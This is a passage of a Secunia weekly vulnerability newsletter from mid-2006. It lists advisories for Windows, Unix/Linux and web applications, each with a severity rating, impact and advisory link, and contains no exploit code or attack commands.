and most reliable source for vulnerability information. Every single 
vulnerability report is being validated and verified before a Secunia
advisory is written.

Secunia validates and verifies vulnerability reports in many different
ways e.g. by downloading the software and performing comprehensive
tests, by reviewing source code, or by validating the credibility of
the source from which the vulnerability report was issued.

As a result, Secunia's database is the most correct and complete source
for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

eEye Digital Security has reported a vulnerability in Symantec Client
Security and Symantec AntiVirus Corporate Edition, which can be
exploited by malicious people to compromise a user's system.

Users of Symantec products are advised to view the referenced Secunia
advisory for additional details and information about patches.

Reference:
http://secunia.com/SA20318

 --

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Weeks Top Ten Most Read Advisories:

1.  [SA20153] Microsoft Word Malformed Object Code Execution
              Vulnerability
2.  [SA19762] Internet Explorer "object" Tag Memory Corruption
              Vulnerability
3.  [SA20107] RealVNC Password Authentication Bypass Vulnerability
4.  [SA19738] Internet Explorer "mhtml:" Redirection Disclosure of
              Sensitive Information
5.  [SA20261] Cisco VPN Client Privilege Escalation Vulnerability
6.  [SA19521] Internet Explorer Window Loading Race Condition Address
              Bar Spoofing
7.  [SA18680] Microsoft Internet Explorer "createTextRange()" Code
              Execution
8.  [SA20288] Novell Netware abend.log User Credentials Disclosure
9.  [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability
10. [SA20300] Basic Analysis and Security Engine "BASE_path" File
              Inclusion

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA20361] wodSFTP ActiveX Component Arbitrary File Access
Vulnerability
[SA20318] Symantec Client Security / AntiVirus Unspecified Code
Execution
[SA20407] F-Secure Products Web Console Buffer Overflow Vulnerability
[SA20357] Enigma Haber Multiple SQL Injection Vulnerabilities
[SA20355] AspSitem SQL Injection and Private Message Disclosure
[SA20348] Nukedit "groupid" Parameter Administrator Register
Vulnerability
[SA20347] Hitachi HITSENSER3 SQL Injection Vulnerability
[SA20335] My Web Server Long URL Denial of Service
[SA20317] Mini-NUKE SQL Injection Vulnerabilities
[SA20309] qjForum member.asp SQL Injection Vulnerability
[SA20294] NewsCMSLite Admin Logon Bypass Vulnerability
[SA20360] ASPBB "search" Parameter Cross-Site Scripting Vulnerability
[SA20319] Omegasoft Insel "WCE" Parameter Cross-Site Scripting
[SA20342] Jiwa Financials Information Disclosure Vulnerability

UNIX/Linux:
[SA20313] Ubuntu update for nagios
[SA20281] Mandriva update for mpg123
[SA20398] SUSE update for kernel
[SA20374] 4nForum "tid" Parameter SQL Injection Vulnerability
[SA20345] Gentoo update for libtiff
[SA20344] Gentoo update for cherrypy
[SA20339] Mandriva update for dia
[SA20338] Debian update for kernel-source-2.4.17
[SA20326] Debian update for libextractor
[SA20323] Open-Xchange Default Account Password
[SA20314] Ubuntu update for postgresql
[SA20284] Pre News Manager Multiple SQL Injection Vulnerabilities
[SA20381] UnixWare update for MySQL
[SA20283] Debian update for awstats
[SA20396] SUSE update for rug
[SA20389] FreeBSD ypserv Inoperative Access Controls Security Issue
[SA20333] Debian update for mysql-dfsg
[SA20302] OpenOBEX ircp File Overwrite Vulnerability
[SA20390] FreeBSD SMBFS chroot Directory Traversal Vulnerability
[SA20388] SUSE update for vixie-cron
[SA20380] Vixie Cron "do_command.c" setuid Security Issue
[SA20370] Shadow "useradd.c" Insecure Mailbox File Permissions
[SA20368] Debian update for motor
[SA20332] Avaya PDS Software Distributor Privilege Escalation
[SA20329] Motor ktools VGETSTRING Buffer Overflow Vulnerability
[SA20325] AIX lsmcode Unspecified Privilege Escalation Vulnerability
[SA20312] SUSE update for foomatic-filters
[SA20369] xine-lib HTTP Response Heap Corruption Weakness
[SA20330] Debian update for tiff
[SA20315] Debian update for dovecot
[SA20308] Dovecot "LIST" Command Directory Traversal Weakness
[SA20349] Linux Kernel SMP "/proc" Race Condition Denial of Service
[SA20337] PHP "curl_init()" Safe Mode Bypass Weakness

Other:
[SA20378] Secure Elements Class 5 AVR Multiple Vulnerabilities
[SA20343] D-Link Airspot DSA-3100 Gateway "uname" Cross-Site Scripting
[SA20288] Novell Netware abend.log User Credentials Disclosure
[SA20377] Secure Elements Class 5 AVR Message Encryption Security
Issue

Cross Platform:
[SA20404] METAjour "system_path" Parameter File Inclusion
Vulnerabilities
[SA20399] Ottoman "default_path" File Inclusion Vulnerabilities
[SA20373] phpMyDesktop|arcade Local File Inclusion and Script
Insertion
[SA20364] IBM DCE Two Kerberos Vulnerabilities
[SA20358] F at cile Interactive Web Multiple Vulnerabilities
[SA20356] tinyBB SQL Injection and File Inclusion Vulnerabilities
[SA20354] phpBB Activity Mod Plus Module "phpbb_root_path" File
Inclusion
[SA20353] UBB.threads Cross-Site Scripting and File Inclusion
[SA20350] phpBB Blend Portal System Module "phpbb_root_path" File
Inclusion
[SA20346] Fastpublish CMS "config[fsBase]" File Inclusion
Vulnerabilities
[SA20331] Hot Open Tickets "CLASS_PATH" Parameter File Inclusion
[SA20310] Plume CMS "/manager/frontinc/prepend.php" File Inclusion
[SA20301] open-medium.CMS "404.php" File Inclusion Vulnerability
[SA20300] Basic Analysis and Security Engine "BASE_path" File
Inclusion
[SA20299] ActionApps "GLOBALS[AA_INC_PATH]" File Inclusion
[SA20298] DoceboLMS "lang" Parameter File Inclusion Vulnerabilities
[SA20292] Back-End CMS "_PSL[classdir]" File Inclusion Vulnerability
[SA20375] pppBLOG "files[0]" Parameter Disclosure of Sensitive
Information
[SA20367] WebCalendar "includedir" Parameter Arbitrary Setting File
Loading
[SA20366] WikiNi Script Insertion Vulnerabilities
[SA20359] phpBB Nivisec Hacks List Module Local File Inclusion
[SA20352] Eggblog posts.php SQL Injection Vulnerability
[SA20351] aMule Information Disclosure Vulnerability
[SA20316] Geeklog Multiple Vulnerabilities and Weaknesses
[SA20307] Seditio "Referer" HTTP Header Script Insertion Vulnerability
[SA20304] ByteHoard File Copy and Script Insertion Vulnerabilities
[SA20303] MailManager PostgreSQL Encoding-Based SQL Injection
[SA20297] V-webmail "CONFIG[pear_dir]" File Inclusion Vulnerability
[SA20295] Pre Shopping Mall SQL Injection Vulnerabilities
[SA20290] ChatPat Script Insertion and SQL Injection Vulnerabilities
[SA20287] iFdate Cross-Site Scripting and Script Insertion
Vulnerabilities
[SA20286] Realty Pro One Cross-Site Scripting and SQL Injection
[SA20363] XiTi Tracking Script "xiti.js" Cross-Site Scripting
Vulnerabilities
[SA20341] Open Searchable Image Catalogue SQL Injection
Vulnerabilities
[SA20340] DGNews "upprocess.php" File Upload Vulnerability
[SA20336] Photoalbum B&W "index.php" Cross-Site Scripting
Vulnerabilities
[SA20334] TikiWiki Multiple Cross-Site Scripting Vulnerabilities
[SA20327] Achievo "atkselector" Parameter SQL Injection Vulnerability
[SA20324] Vacation Rental Script "obj" Parameter Cross-Site Scripting
[SA20322] Pretty Guestbook "pagina" Cross-Site Scripting Vulnerability
[SA20321] Smile Guestbook "pagina" Cross-Site Scripting Vulnerability
[SA20320] Morris Guestbook "pagina" Cross-Site Scripting Vulnerability
[SA20311] php-residence Multiple Script Insertion Vulnerabilities
[SA20306] PHPSimpleChoose Cross-Site Scripting Vulnerability
[SA20305] PHP-AGTC membership system "useremail" Script Insertion
[SA20296] CMS Mundo "searchstring" Cross-Site Scripting Vulnerability
[SA20293] phpESP ADOdb Cross-Site Scripting Vulnerabilities
[SA20291] AZ Photo Album Script Pro Cross-Site Scripting Vulnerability
[SA20289] Elite-Board "search" Parameter Cross-Site Scripting
Vulnerability
[SA20285] Assetman Unspecified Script Insertion Vulnerabilities
[SA20282] iFlance Multiple Cross-Site Scripting Vulnerabilities

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA20361] wodSFTP ActiveX Component Arbitrary File Access
Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      Exposure of system information, Exposure of sensitive
information, System access
Released:    2006-05-31

Will Dormann has reported a vulnerability in WeOnlyDo wodSFTP, which
can be exploited by malicious people to disclose sensitive information
and potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20361/

 --

[SA20318] Symantec Client Security / AntiVirus Unspecified Code
Execution

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-29

eEye Digital Security has reported a vulnerability in Symantec Client
Security and Symantec AntiVirus Corporate Edition, which can be
exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20318/

 --

[SA20407] F-Secure Products Web Console Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-06-01

A vulnerability has been reported in F-Secure Anti-Virus for Microsoft
Exchange and F-Secure Internet Gatekeeper, which potentially can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20407/

 --

[SA20357] Enigma Haber Multiple SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-29

Mustafa Can Bjorn has reported some vulnerabilities in Enigma Haber,
which can be exploited by malicious people to conduct SQL injection
attacks.

Full Advisory:
http://secunia.com/advisories/20357/

 --

[SA20355] AspSitem SQL Injection and Private Message Disclosure

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data, Exposure of sensitive information
Released:    2006-05-29

Mustafa Can Bjorn has reported two vulnerabilities in AspSitem, which
can be exploited by malicious users to disclose sensitive information
or malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20355/

 --

[SA20348] Nukedit "groupid" Parameter Administrator Register
Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-05-30

FarhadKey has discovered a vulnerability in Nukedit, which can be
exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20348/

 --

[SA20347] Hitachi HITSENSER3 SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-31

A vulnerability has been reported in Hitachi HITSENSER3, which can be
exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20347/

 --

[SA20335] My Web Server Long URL Denial of Service

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-05-29

s3rv3r_hack3r has discovered a vulnerability in My Web Server, which
can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/20335/

 --

[SA20317] Mini-NUKE SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-29

Mustafa Can Bjorn has reported some vulnerabilities in Mini-NUKE, which
can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20317/

 --

[SA20309] qjForum member.asp SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-29

ajann has reported a vulnerability in qjForum, which can be exploited
by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20309/

 --

[SA20294] NewsCMSLite Admin Logon Bypass Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-05-26

FarhadKey has discovered a vulnerability in NewsCMSLite, which can be
exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20294/

 --

[SA20360] ASPBB "search" Parameter Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Mustafa Can Bjorn has reported a vulnerability in ASPBB, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20360/

 --

[SA20319] Omegasoft Insel "WCE" Parameter Cross-Site Scripting

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-31

MC.Iglo has reported a vulnerability in Omegasoft Insel, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20319/

 --

[SA20342] Jiwa Financials Information Disclosure Vulnerability

Critical:    Less critical
Where:       From local network
Impact:      Exposure of sensitive information
Released:    2006-05-30

Robert Passlow has reported a vulnerability in Jiwa Financials, which
can be exploited by malicious users to disclose potentially sensitive
information.

Full Advisory:
http://secunia.com/advisories/20342/


UNIX/Linux:--

[SA20313] Ubuntu update for nagios

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-05-30

Ubuntu has issued an update for nagios. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20313/

 --

[SA20281] Mandriva update for mpg123

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-29

Mandriva has issued an update for mpg123. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
user's system.

Full Advisory:
http://secunia.com/advisories/20281/

 --

[SA20398] SUSE update for kernel

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Exposure of system information, Exposure
of sensitive information, DoS
Released:    2006-06-01

SUSE has issued an update for the kernel. This fixes some
vulnerabilities and weaknesses, which can be exploited by malicious,
local users to bypass certain security restrictions, gain knowledge of
potentially sensitive information and to cause a DoS (Denial of
Service), and by malicious people to disclose certain system
information, potentially to bypass certain security restrictions and to
cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/20398/

 --

[SA20374] 4nForum "tid" Parameter SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-31

CrAzY CrAcKeR has reported a vulnerability in 4nForum, which can be
exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20374/

 --

[SA20345] Gentoo update for libtiff

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-05-31

Gentoo has issued an update for libtiff. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20345/

 --

[SA20344] Gentoo update for cherrypy

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-05-31

Gentoo has issued an update for cherrypy. This fixes a vulnerability,
which can be exploited by malicious people to disclose potentially
sensitive information.

Full Advisory:
http://secunia.com/advisories/20344/

 --

[SA20339] Mandriva update for dia

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-05-31

Mandriva has issued an update for dia. This fixes some vulnerabilities,
which potentially can be exploited by malicious people to compromise a
user's system.

Full Advisory:
http://secunia.com/advisories/20339/

 --

[SA20338] Debian update for kernel-source-2.4.17

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, Exposure of sensitive
information, Privilege escalation, DoS, System access
Released:    2006-05-31

Debian has issued an update for kernel-source-2.4.17. This fixes some
vulnerabilities, which can be exploited by malicious, local users to
gain knowledge of sensitive information, cause a DoS (Denial of
Service), gain escalated privileges, and by malicious people to cause a
DoS, and disclose potentially sensitive information.

Full Advisory:
http://secunia.com/advisories/20338/

 --

[SA20326] Debian update for libextractor

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-05-29

Debian has issued an update for libextractor. This fixes two
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise an application that
uses the library.

Full Advisory:
http://secunia.com/advisories/20326/

 --

[SA20323] Open-Xchange Default Account Password

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-05-29

Cemil Degirmenci has reported a security issue in Open-Xchange, which
potentially can be exploited by malicious people to bypass certain
security restrictions.

Full Advisory:
http://secunia.com/advisories/20323/

 --

[SA20314] Ubuntu update for postgresql

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-30

Ubuntu has issued an update for postgresql. This fixes two
vulnerabilities, which potentially can be exploited by malicious people
to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20314/

 --

[SA20284] Pre News Manager Multiple SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-05-26

luny has reported some vulnerabilities in Pre News Manager, which can
be exploited by malicious people to conduct cross-site scripting
attacks and SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20284/

 --

[SA20381] UnixWare update for MySQL

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2006-06-01

SCO has issued an update for MySQL. This fixes a vulnerability, which
can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20381/

 --

[SA20283] Debian update for awstats

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass, System access
Released:    2006-05-26

Debian has issued an update for awstats. This fixes a security issue,
which can be exploited by malicious people to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/20283/

 --

[SA20396] SUSE update for rug

Critical:    Less critical
Where:       From local network
Impact:      Security Bypass, Exposure of sensitive information
Released:    2006-06-01

SUSE has issued an update for rug. This fixes a security issue and a
weakness, which can be exploited by malicious, local users to disclose
certain sensitive information and potentially by malicious people to
bypass security restrictions.

Full Advisory:
http://secunia.com/advisories/20396/

 --

[SA20389] FreeBSD ypserv Inoperative Access Controls Security Issue

Critical:    Less critical
Where:       From local network
Impact:      Security Bypass
Released:    2006-06-01

A security issue has been reported in FreeBSD, which can be exploited
by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20389/

 --

[SA20333] Debian update for mysql-dfsg

Critical:    Less critical
Where:       From local network
Impact:      Security Bypass, Exposure of sensitive information, System
access
Released:    2006-05-29

Debian has issued an update for mysql-dfsg. This fixes some
vulnerabilities, which can be exploited by malicious users to bypass
certain security restrictions, disclose potentially sensitive
information, and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20333/

 --

[SA20302] OpenOBEX ircp File Overwrite Vulnerability

Critical:    Less critical
Where:       From local network
Impact:      Manipulation of data
Released:    2006-05-26

Jeroen van Wolffelaar has reported a vulnerability in Open OBEX, which
can be exploited by malicious people to manipulate certain data on a
user's system.

Full Advisory:
http://secunia.com/advisories/20302/

 --

[SA20390] FreeBSD SMBFS chroot Directory Traversal Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass
Released:    2006-06-01

A vulnerability has been reported in FreeBSD, which can be exploited by
malicious, local users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20390/

 --

[SA20388] SUSE update for vixie-cron

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-06-01

SUSE has issued an update for vixie-cron. This fixes a security issue,
which potentially can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/20388/

 --

[SA20380] Vixie Cron "do_command.c" setuid Security Issue

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-06-01

Roman Veretelnikov has reported a security issue in Vixie Cron, which
potentially can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/20380/

 --

[SA20370] Shadow "useradd.c" Insecure Mailbox File Permissions

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-05-31

A security issue has been reported in Shadow, which potentially can be
exploited by malicious, local users to perform certain actions with
escalated privileges.

Full Advisory:
http://secunia.com/advisories/20370/

 --

[SA20368] Debian update for motor

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-05-31

Debian has issued an update for motor. This fixes a vulnerability,
which potentially can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/20368/

 --

[SA20332] Avaya PDS Software Distributor Privilege Escalation

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-05-29

Avaya has acknowledged a vulnerability in Avaya Predictive Dialing
System (PDS), which can be exploited by malicious, local users to gain
escalated privileges.

Full Advisory:
http://secunia.com/advisories/20332/

 --

[SA20329] Motor ktools VGETSTRING Buffer Overflow Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-05-31

A vulnerability has been reported in Motor, which potentially can be
exploited by malicious, local users to perform certain actions with
escalated privileges.

Full Advisory:
http://secunia.com/advisories/20329/

 --

[SA20325] AIX lsmcode Unspecified Privilege Escalation Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-05-29

A vulnerability has been reported in AIX, which can be exploited by
malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/20325/

 --

[SA20312] SUSE update for foomatic-filters

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-05-30

SUSE has issued an update for foomatic-filters. This fixes a
vulnerability, which can be exploited by malicious, local users to gain
escalated privileges.

Full Advisory:
http://secunia.com/advisories/20312/

 --

[SA20369] xine-lib HTTP Response Heap Corruption Weakness

Critical:    Not critical
Where:       From remote
Impact:      DoS
Released:    2006-05-31

Federico L. Bossi Bonin has discovered a weakness in xine-lib, which
can be exploited by malicious people to crash certain applications on a
user's system.

Full Advisory:
http://secunia.com/advisories/20369/

 --

[SA20330] Debian update for tiff

Critical:    Not critical
Where:       From remote
Impact:      DoS
Released:    2006-05-29

Debian has issued an update for tiff. This fixes a vulnerability, which
can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/20330/

 --

[SA20315] Debian update for dovecot

Critical:    Not critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-05-29

Debian has issued an update for dovecot. This fixes a weakness, which
can be exploited by malicious users to gain knowledge of potentially
sensitive information.

Full Advisory:
http://secunia.com/advisories/20315/

 --

[SA20308] Dovecot "LIST" Command Directory Traversal Weakness

Critical:    Not critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-05-29

A weakness has been reported in Dovecot, which can be exploited by
malicious users to gain knowledge of potentially sensitive
information.

Full Advisory:
http://secunia.com/advisories/20308/

 --

[SA20349] Linux Kernel SMP "/proc" Race Condition Denial of Service

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-05-31

Tony Griffiths has reported a vulnerability in the Linux Kernel, which
can be exploited malicious, local users to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/20349/

 --

[SA20337] PHP "curl_init()" Safe Mode Bypass Weakness

Critical:    Not critical
Where:       Local system
Impact:      Security Bypass
Released:    2006-05-30

Maksymilian Arciemowicz has discovered a weakness in PHP, which can be
exploited by malicious, local users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/20337/


Other:--

[SA20378] Secure Elements Class 5 AVR Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From local network
Impact:      Security Bypass, Spoofing, Exposure of system information,
Exposure of sensitive information, DoS, System access
Released:    2006-05-31

Multiple vulnerabilities and security issues have been reported in
Secure Elements Class 5 AVR, which can be exploited by malicious people
to disclose potentially sensitive information, bypass certain security
restrictions, spoof the contents of messages, cause a DoS (Denial of
Service) and potentially to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20378/

 --

[SA20343] D-Link Airspot DSA-3100 Gateway "uname" Cross-Site Scripting

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

jaime.blasco has reported a vulnerability in D-Link Airspot DSA-3100
Gateway, which can be exploited by malicious people to conduct
cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20343/

 --

[SA20288] Novell Netware abend.log User Credentials Disclosure

Critical:    Less critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2006-05-26

A security issue has been reported in Novell Netware, which can be
exploited by malicious, local users to gain knowledge of sensitive
information.

Full Advisory:
http://secunia.com/advisories/20288/

 --

[SA20377] Secure Elements Class 5 AVR Message Encryption Security
Issue

Critical:    Not critical
Where:       From local network
Impact:      Exposure of sensitive information
Released:    2006-05-31

A security issue has been reported in Secure Elements Class 5 AVR,
which potentially can be exploited by malicious people to disclose
certain sensitive information.

Full Advisory:
http://secunia.com/advisories/20377/


Cross Platform:--

[SA20404] METAjour "system_path" Parameter File Inclusion
Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-06-01

Kacper has discovered some vulnerabilities in METAjour, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20404/

 --

[SA20399] Ottoman "default_path" File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-06-01

Kacper has discovered some vulnerabilities in Ottoman, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20399/

 --

[SA20373] phpMyDesktop|arcade Local File Inclusion and Script
Insertion

Critical:    Highly critical
Where:       From remote
Impact:      Exposure of sensitive information, System access, Cross
Site Scripting
Released:    2006-05-31

darkgod has discovered two vulnerabilities in phpMyDesktop|arcade,
which can be exploited by malicious people to conduct script insertion
attacks, disclose sensitive information, and compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/20373/

 --

[SA20364] IBM DCE Two Kerberos Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-06-01

IBM has acknowledged two vulnerabilities in IBM DCE, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20364/

 --

[SA20358] F at cile Interactive Web Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, System access
Released:    2006-05-29

Mustafa Can Bjorn has reported some vulnerabilities in F at cile
Interactive Web, which can be exploited by malicious people to conduct
cross-site scripting attacks, disclose sensitive information, and
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20358/

 --

[SA20356] tinyBB SQL Injection and File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Manipulation of data, System access
Released:    2006-05-29

Mustafa Can Bjorn has discovered some vulnerabilities in tinyBB, which
can be exploited by malicious people to conduct SQL injection attacks
and to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20356/

 --

[SA20354] phpBB Activity Mod Plus Module "phpbb_root_path" File
Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-30

Mustafa Can Bjorn has reported a vulnerability in the Activity Mod Plus
module for phpBB, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20354/

 --

[SA20353] UBB.threads Cross-Site Scripting and File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, System access
Released:    2006-05-30

Mustafa Can Bjorn has discovered some vulnerabilities in UBB.threads,
which can be exploited by malicious people to conduct cross-site
scripting attacks and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20353/

 --

[SA20350] phpBB Blend Portal System Module "phpbb_root_path" File
Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-30

Mustafa Can Bjorn has reported a vulnerability in the Blend Portal
System module for phpBB, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20350/

 --

[SA20346] Fastpublish CMS "config[fsBase]" File Inclusion
Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-30

Kacper has reported some vulnerabilities in Fastpublish CMS, which can
be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20346/

 --

[SA20331] Hot Open Tickets "CLASS_PATH" Parameter File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-29

Kacper has discovered a vulnerability in Hot Open Tickets, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20331/

 --

[SA20310] Plume CMS "/manager/frontinc/prepend.php" File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-29

beford has discovered a vulnerability in Plume CMS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20310/

 --

[SA20301] open-medium.CMS "404.php" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-26

Kacper has discovered a vulnerability in the open-medium.CMS, which can
be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20301/

 --

[SA20300] Basic Analysis and Security Engine "BASE_path" File
Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-26

str0ke has discovered some vulnerabilities in Basic Analysis and
Security Engine, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20300/

 --

[SA20299] ActionApps "GLOBALS[AA_INC_PATH]" File Inclusion

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-26

Kacper has discovered some vulnerabilities in ActionApps, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20299/

 --

[SA20298] DoceboLMS "lang" Parameter File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-26

beford has discovered some vulnerabilities in DoceboLMS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20298/

 --

[SA20292] Back-End CMS "_PSL[classdir]" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-05-26

Kacper has discovered a vulnerability in Back-End CMS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20292/

 --

[SA20375] pppBLOG "files[0]" Parameter Disclosure of Sensitive
Information

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-06-01

rgod has discovered a vulnerability in pppBLOG, which can be exploited
by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/20375/

 --

[SA20367] WebCalendar "includedir" Parameter Arbitrary Setting File
Loading

Critical:    Moderately critical
Where:       From remote
